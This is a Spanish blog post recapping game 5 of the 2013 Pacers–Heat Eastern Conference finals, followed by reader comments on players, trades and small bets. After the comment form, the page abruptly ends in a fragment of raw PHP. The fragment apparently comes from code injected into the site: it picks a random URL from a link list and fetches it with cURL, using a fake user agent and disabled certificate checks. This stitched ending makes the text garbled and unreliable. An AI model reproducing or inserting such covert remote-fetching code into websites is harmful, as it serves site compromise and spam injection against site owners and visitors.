La Crónica: Sesión doble

31 de May de 2013 por MagicJohnson32

Como si se tratase de dos relatos distintos, dos películas con los mismos actores pero distintos guiones, así fueron la primera y la segunda mitad del encuentro disputado anoche entre Pacers y Heat, quinto de las finales de la Conferencia Este y que dejó a Miami a un paso de la clasificación (79-90).

lebronEl relato de la primera mitad tuvo como protagonistas a Roy Hibbert y Paul George, autores de los 29 primeros puntos de su equipo. Ningún otro Pacer anotó hasta transcurridos 15 minutos de partido, ni falta que hizo para que Indiana dominase este tramo inicial. La consistencia de sus dos jugadores de referencia y las dificultades de los Heat para anotar en ataques estáticos dieron a los visitantes rentas de hasta 7 puntos (34-27). El escaso (tirando a nulo) rendimiento del backcourt de los Pacers acabaría pasando factura ante la esperable reacción local, pero tres canastas seguidas de David West salvaron una ventaja de 4 puntos al descanso para el conjunto dirigido por Frank Vogel (44-40).

Final de esta película. Inicio de una muy diferente.

En la reanudación, LeBron James se pidió el papel protagonista, el de estrella absoluta e indiscutible, con Udonis Haslem de nuevo erigido a secundario de lujo, como ya sucediera en el tercer partido de la serie. De los 30 puntos anotados por los Heat en el tercer cuarto, 26 llegaron de las manos de Haslem y James, imperial en cuanto los Pacers empezaron a hacer concesiones en forma de pérdidas de balón y malas transiciones defensivas. La ausencia de un auténtico director de juego pesó más que nunca para Indiana, que no encontró respuestas cuando los Heat apretaron atrás. Los malos tiros y los errores se sucedían en un lado de la pista, y esta vez los Heat controlaron el rebote en su aro, lo que dio pista libre a LeBron para orquestar un parcial definitivo de 13-30 que a falta de 12 minutos dejaba el partido cuesta abajo para Miami (57-70).

En el último cuarto, el ataque de los Pacers mejoró a partir de simplificar las cosas, es decir, de poner la pelota en manos de George, Hibbert y West. Pero ya era demasiado tarde. Los Heat administraron sin apuros la ventaja, que no llegó a bajar de los ocho puntos, y se apuntaron una victoria que les deja a un paso de disputar sus terceras Finales consecutivas. Su primera oportunidad de cerrar la eliminatoria será este sábado (2h30) en el Bankers Life Fieldhouse de Indianapolis.

PREMIOS

HaslemMVP: LeBron James se marcó 30 puntos, 8 rebotes y 6 asistencias pero para la memoria queda sobre todo su tercer cuarto prácticamente inmaculado. Anotó 16 puntos y repartió 4 asistencias, mejores marcas que todos los Pacers en global, y decantó el partido del lado local.

Sorpresa: De nuevo Udonis Haslem se convierte en el mejor compañero de LeBron. Como en el tercer partido, anotó 8 de sus 9 tiros y acabó con 16 puntos.

Decepción: Podríamos volver a hablar del pobre partido de Chris Bosh y Dwyane Wade pero hoy conviene destacar más el triste y solitario punto que anotó George Hill tras fallar los 4 tiros que intentó. Tampoco estuvo mucho mejor su compañero de backcourt, Lance Stephenson, que sólo anotó dos canastas cuando el partido ya estaba sentenciado. Entre ambos, 2 de 11 en tiros de campo y 5 puntos.

Esfuerzo en vano: El frontcourt de los Pacers jugó a muy buen nivel. Entre Paul GeorgeDavid West y Roy Hibbert anotaron 66 de los 79 puntos de su equipo.

HIGHLIGHTS

Imágenes | AP Photos / Getty Images

Comenta

21 comentarios a esta entrada

  1. Laker1624 dice:
    #1

    Buenas,

    Creo que Indiana no consigue hacer funcionar todas sus piezas a la misma vez. Para mi hoy George ha hecho un gran partido y es el único Pacer al que hay poco o nada que reprochar. Los interiores Hibbert y West me parece que han estado bien en ataque, pero han fallado en el aspecto reboteador, que en mi opinión es clave tanto como para evitar las transiciones rápidas de Miami como para aportar puntos en la pintura. Stephenson creo que ha vuelto ha hacer gala de su irregularidad y Hill no ha estado a la altura. Ahora bien, considero que Indiana esta capacitado para sobreponerse a esta derrota. Creo que las dos primeras victorias de Miami fueron bastante duras para los Pacers, y aun así han conseguido vencer en el siguiente partido. En el primer partido Indiana perdió prácticamente en el último segundo con la polémica bandeja de James, digo polémica por la defensa de Indiana en esa jugada. En el primer partido que se disputo en Indiana, Miami se impuso con bastante claridad y de nuevo consiguieron los Pacers vencer en el siguiente partido. Yo por mi parte aun no entierro a estos Pacers porque pienso que tienen armas suficientes para seguir dando guerra.

      Citar

  2. Jose Luis dice:
    #2

    Yo diría polémica por el medio segundo de más que se le concedió a Miami para hacer la jugada… se ve claramente que el crono no empieza a andar cuando James recibe el balón, sino cuando ya casi ha superado a George.

    Pacers puede ganar el próximo partido, pero si perdiera tampoco sería una sorpresa.

      Citar

  3. Laker1624 dice:
    #3

    Yo tampoco lo vería como una sorpresa si perdiesen el siguiente partido, de hecho creo que es lo más probable. Lo que me sorprendería de verdad es que Indiana se plantase en la final. Pero como he dicho creo que tienen potencial para plantar cara a Miami.
    A medida que nos acercamos al desenlace de la final de la ECF veo que Miami lo tendrá más difícil de lo que yo pensaba en el caso de llegar a la final. Sobretodo por el estado actual de Wade, creo que físicamente no podrá mejorar de cara a las finales.

      Citar

  4. sempren dice:
    #4

    Además, el estado de Wade será más problemático al tener enfrente a un gran defensor como Danny Green, contando que sea Leonard el que se encargue de LeBron.

    Después de ganar a los Thunder, consideraba más favoritos a los Grizzlies que a los Spurs, pero también sostenía que si San Antonio era capaz de ganar a los ositos, significaría que realmente están en disposición de luchar muy fuerte contra Miami, y tras barrerlos… creo que serán unas finales muy bonitas. Si Splitter se sumase a la fiesta (de Diaw no espero que domine a los Heat, y Bonner es muy defendible por ellos), creo que los Spurs serían claramente superiores

      Citar

  5. sempren dice:
    #5

    Vamos, como el dominio interior que están teniendo los Pacers, con una defensa exterior muy parecida, pero sumándole a Parker y a Manudo (al que también le toca despertar definitiva y regularmente).

    De hecho, yo veo a los Pacers del año que viene, y creo que con la renovación de West, un buen base suplente (Augustine afortunadamente acaba contrato) y algún exterior anotador, los Pacers serán temibles.

      Citar

  6. GreenPride dice:
    #6

    El Rey y la defensa de Miami dictarion su sentencia.
    El encuentro empezó con unos Pacers de nuevo muy serios. Con Paul George en plan estrella y Hibbert dominando las zonas cobraron ventajas de 6-8 puntos que mantuvieron hasta el descanso. Los Heat andaban atascados y sólo LeBron parecía capaz de sacarles del atolladero.
    Y aquí volvieron del descanso y LeBron tomó el mando. Hizo y deshizo en un fenomenal tercer cuarto y tuvo a Haslem de aliado para aprovechar los espacios con sus tiros desde la media distancia. Además la defensa de los Heat subió de intensidad y se vió lo que a veces pasa a los Pacers. Carecen de suficientes armas ofensivas para sobrevivir a esas situaciones. La ventaja que cogieron los de Florida ya fue imposible de recuperar.
    Por Miami es preocupante la baja forma de Bosh y Wade y o mejoran o aún pasando esta eliminatoria creo que lo pasarán muy mal contra los Spurs. A parte de ellos la defensa mejoró mucho en la segunda parte permitiéndoles algo más de juego en transición y consiguieron igualar el rebote.
    Por los Pacers partidazo de George en ataque y bien los interiores pero no consiguieron rebotear mucho mejor que los Heat y eso es muy importante para ellos y sus dos exteriores estuvieron absolutamente negados de cara al aro al igual que el banquillo.
    Ahora los Heat deben salir más confiados para el 6º donde la eliminatoria podría terminar. Es hora de ver si estos Pacers tienen carácter para estas alturas de la temporada y si son capaces de venirse arriba y forzar un 7º pero incluso así la cosa queda en claro favoritismo una vez más para los Heat que aún dando la impresión de no estar del todo bien parecen poder pasar a lomos del Rey…

      Citar

  7. Esteban dice:
    #7

    hubo partido hasta que el ataque de los pacers se atasco definitivamente con austin en cancha y alli a la vez se animo el heat y se decepcionaron los propios pacers que dejaron de defender como saben

    una pena ver una banca tan mediocre para indiana, austin, mahimi, y young no tienen el nivel para ser relevemos en esta instancia

    con un solo hombre capaz de anotar con consistencia desde la banca, lease jamal crawford, otra seria la historia

    el año que viene puede estar disponible y a la venta jeson terry, q bien les vendria a los pacers

      Citar

  8. Laker1624 dice:
    #8

    Con el regreso de Granger yo creo que este equipo mejoraría bastante y les haría subir un peldaño mas, siempre y cuando siga en el equipo lógicamente.

      Citar

  9. HisRoyalAirness dice:
    #9

    In Pop we trust

      Citar

  10. HisRoyalAirness dice:
    #10

    (I) trust

      Citar

  11. maravich dice:
    #11

    ¿Por quién apostar hoy en el sexto de la serie?
    Hablo de apostar no en sentido figurado, sino en el real, materialista vamos…
    Así como veía claro que el #4 y #5 partidos se los llevaban los locales (IND herido tras perder el #3 en casa y MIA tras perder ese #4 claramente en Indianápolis), esta vez no lo veo claro por quién apostar… pero sí veo claro que voy a apostar… ya sabéis hay que aprovechar cuando vas ganando varias veces seguidas…

    Así que…¿qué mejor foro para pediros consejo? Se admiten sugerencias, en esta página sí voy a tenerlas en cuenta, por supuesto… se trata de seguir “on fire”, como Paul George… vaya crack… y lo que más asusta es el potencial que aun tiene por explotar…

      Citar

  12. Sancho88 dice:
    #12

    Maravich, al menos está claro que el partido se puede ir a más de 200 puntos, esa sería una buena apuesta. En casa Indiana sale a matar desde el principio y se ven partidos muy bonitos. Además, sin expulsiones de por medio y con Bosh sano, Wade mejorando y Lebron con ganas de finiquitar… me parecería una buena apuesta para esta noche. Yo afortunadamente dejé ese mundillo y no lo volveré a tocar, pero ya que preguntas…

    Por cierto, muy de acuerdo con Laker1624. El año que viene con Granger este equipo tendrá sentido y un anotador para resolver muchas situaciones. Supongo que su rol será de sexto hombre, pero podrá aportar. Me sorprende mucho no ver a Gerald Green jugando absolutamente nada en estos playoffs… alguien sabe por qué es? creo que mejor que Sam Young lo haría fijo.

    Y si Indiana no quiere ver a Granger como un sexto hombre, podrían mirar un traspaso con Sacramento Evans x Granger. Ahí sí que serían los Pacers aspirantes al título y Sacramento reforzaría su alero titular, algo que no tienen desde hace tiempo

      Citar

  13. maravich dice:
    #13

    Ok gracias Sancho… pero apuesto solo a partido ganado… por experiencia es lo mejor, los puntos, el hándicap etc no se me da bien… no te preocupes yo no suelo jugar solo estos días, pero llevo bastante ganado y ya sabes… en el momento q no vaya ganando mucho me retiro… Buen análisis.

      Citar

  14. Sancho88 dice:
    #14

    Lo mejor es cuando llevas unos beneficios, sacar al menos lo que has metido, y a partir de ahí, jugar sobre beneficios y sin hacer locuras de all-ines. Esto es muy fácil de decir pero luego uno se vicia y hace allines, jajaja. Suerte Pete!!

      Citar

  15. rumbero dice:
    #15

    Sancho88:
    Lo mejor es cuando llevas unos beneficios, sacar al menos lo que has metido, y a partir de ahí, jugar sobre beneficios y sin hacer locuras de all-ines. Esto es muy fácil de decir pero luego uno se vicia y hace allines, jajaja. Suerte Pete!!

    Y tan difícil…ganas unos pocos eurillos de pura potra y uno ya escucha la voz de Gordon Gekko diciendo que la codicia es buena y necesaria mientras te fumas el puraco delante la pantalla. No me voy a mojar, pero hoy no juega Birdman por sanción eso si y hasta el momento se han ido alternando victorias, pero si que parece que hoy puede ser un partido diferente. A ver…suerte apostantes

      Citar

  16. maravich dice:
    #16

    Gracias por los comentarios, aun quedan unas horitas y bueno creo que apostaré por Indiana, solo 20 €… está a 2.5 aprox… aun puede fluctuar…
    Qué bueno lo del puraco Rumbero, es cierto ahí delante de la pantalla o viendo el partido por tv… te comes el cigarro o lo q sea si has apostado fuerte…
    Lo que sí estaría clara sería la apuesta de haber un 7′ partido… a fuego por los Heat… sin duda… sería lo ideal, así gano hoy y gano el de Miami…
    Y la baja del “hombre pájaro” (que no “pájaro” como dicen los iluminaos) sí q es más importante de lo que parece, o puede serlo… uno menos para derrotar al gigante de Georgetown… vaya panda de centers los Hoyas: Ewing, Mourning, Mutombo, Hibbert, Monroe… qué grande John Thompson… y ese uniforme gris oscuro… por fin ha despertado el gigante Hibbert… ha dado un paso adelante de tres pares de coj..

      Citar

  17. Sancho88 dice:
    #17

    El otro día Stan Van Gundy dijo que con los ojos cerrados Howard es mejor que Hibbert… Yo no lo tengo ya tan claro. Es más, creo que la posición de center ya no es tan mierdosa en la liga. Marc, Hibbert, Noah, Horford, Cousins, A. Davis, Duncan, Pekovic, Vucevic… que Howard es el mejor pívot de la liga ya no está tan claro. Y luego Bynum, que si quiere volver a jugar… tb es un bicharraco

      Citar

  18. Denise dice:
    #18

    Sancho88:
    . Y luego Bynum, que si quiere volver a jugar… tb es un bicharraco

    A proposito…si fuerias GM…os la jugaríais este verano con Bynum ofreciendole un buen contratito?? A lo mejor el año que viene se presenta y me calla la boca haciendo un 16-10 ó algo así, pero yo si fuese GM, lo maximo que le ofrecía sería un año de contrato y 2 millones de dólares, y aún así pienso que soy generoso dado la profesionalidad mostrada por este individuo.
    Veremos a ver qué contender se arriesga y se la juega.

    Otro center que debe volver el año que viene es Odem.

      Citar

  19. maravich dice:
    #19

    Gracias a todos por los comentarios sobre quién apostar… Cuando estás en racha… al final sí aposté por Indiana, 20 € y me he ganao casi 50 eurakos…
    Ahora que llevo acumulao será el momento de dejarlo… la victoria de MIA el lunes noche no se cotiza ni a 1,30… por mucho 3-3 que vayan no parece viable una victoria de Pacers en Miami un 7° partido…

    Como se suele decir, una retirada a tiempo es una victoria… y con los bolsillos llenos más todavía…
    Y a Indiana, que le quiten lo bailao…

      Citar

  20. L.Casei dice:
    #20

    ¿De verdad confiáis aún en Oden?
    Yo me cansé de confiar durante 5 años… el año que viene con Oden, Roy, Aldrige, Batum… pero nada 82 partidos en 5 años y luego lo de Roy…
    Ojalá me equivoque, pero no veo que vaya a pasar ni lo de Sam Bowie, que por lo menos volvió a jugar a un cierto nivel aunque siempre de cristal… Es triste, pero es que no me imagino a Oden jugando a baloncesto…

      Citar

  21. Denise dice:
    #21

    L.Casei:
    ¿De verdad confiáis aún en Oden?
    Yo me cansé de confiar durante 5 años… el año que viene con Oden, Roy, Aldrige, Batum… pero nada 82 partidos en 5 años y luego lo de Roy…
    Ojalá me equivoque, pero no veo que vaya a pasar ni lo de Sam Bowie, que por lo menos volvió a jugar a un cierto nivel aunque siempre de cristal… Es triste, pero es que no me imagino a Oden jugando a baloncesto…

    Hombre, personalmente, no confío en que se convierta en un pivot dominante y que te promedie un 18-10, pero creo que si podría volver a un nivel medio decente y tener roles tipo el Pajaro Andersen ó el actual Kenion Martin, jugando en equipos contenders al anillo unos 18 minutitos y aportando 6 puntillos, 5 rebotes y buena defensa durante el rato que las rodillas le permitan estar en pista.

    Suena que los Cavs estarían interesados en contratarle pero no a cualquier precio, ¿os imaginais una pintura Varejao-Nerlens Noel-Odem? Sería una autentica ruleta rusa pero el que no arriesga no gana.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>